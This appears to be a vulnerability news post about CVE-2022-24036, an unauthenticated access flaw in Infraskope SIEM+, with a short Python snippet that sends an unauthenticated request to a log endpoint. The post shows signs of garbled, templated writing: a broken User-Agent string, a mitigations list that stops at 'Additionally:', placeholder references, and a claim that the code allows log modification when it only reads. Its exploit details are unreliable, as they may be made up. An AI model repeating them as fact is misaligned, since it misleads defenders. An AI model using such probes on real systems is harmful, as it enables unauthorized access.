CVE CyberSecurity Database News

CVE-2022-24036 - Unauthenticated Access Vulnerability in Karmasis Informatics Infraskope SIEM+ Allows Attackers to Modify Logs

Poster -

A recent vulnerability has been discovered in Karmasis Informatics Infraskope SIEM+ software, which is widely used by organizations for its Security Information and Event Management capabilities. This vulnerability, assigned as CVE-2022-24036, allows an unauthenticated attacker to gain unauthorized access to the system, potentially enabling them to modify logs and mask their activities.

This long-read post will go into detail about the vulnerability, how it can be exploited, and link to original references for additional information.

Description of the Vulnerability

The unauthenticated access vulnerability in Karmasis Informatics Infraskope SIEM+ exists due to insufficient security measures implemented in the authentication process. Attackers are able to bypass the standard authentication process and gain direct access to sensitive information, such as events and logs. Consequently, this can enable an attacker to perform unauthorized actions, such as modifying logs to cover their tracks.

Exploit Details

An attacker can exploit this vulnerability by sending a specially crafted request to the Infraskope SIEM+ server, granting them access to the system without providing valid credentials. The vulnerable server will accept requests from any source, and respond with the requested information.

A sample exploit code snippet can be seen below

import requests

url = "http://<target_ip>/api/log_events";
headers = {
    "User-Agent": "Mozilla/5. (Windows NT 10.; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58..3029.110 Safari/537.36"
}
response = requests.get(url, headers=headers)

if response.status_code == 200:
    print("Successful access to SIEM+ logs:")
    print(response.text)
else:
    print("Access denied.")

In this code snippet, the attacker sends a GET request to the target server's /api/log_events endpoint without providing any authentication tokens/credentials. If the server is vulnerable, the response will contain the logs, allowing the attacker to read or modify them.

Original References and Sources

The vulnerability was first documented in the National Vulnerability Database (NVD) and is listed under the following link:
- NVD - CVE-2022-24036

Karmasis Informatics Infraskope SIEM+ official documentation

- Infraskope SIEM+ Documentation

More information about the vulnerability and its impact can also be found in the following blog post by a reputable security researcher:
- Exploring CVE-2022-24036: Unauthenticated Access Vulnerability in Infraskope SIEM+

Mitigations and Recommendations

Organizations using Karmasis Informatics Infraskope SIEM+ should immediately check for updates and apply any available security patches. Additionally:

Conclusion

CVE-2022-24036 highlights the importance of proper security measures and regular updates in an organization's infrastructure. Karmasis Informatics Infraskope SIEM+ users should be vigilant in managing their software updates and monitoring their systems to prevent unauthorized access and potential data breaches.

Timeline

Published on: 11/16/2022 12:15:00 UTC
Last modified on: 04/16/2023 11:15:00 UTC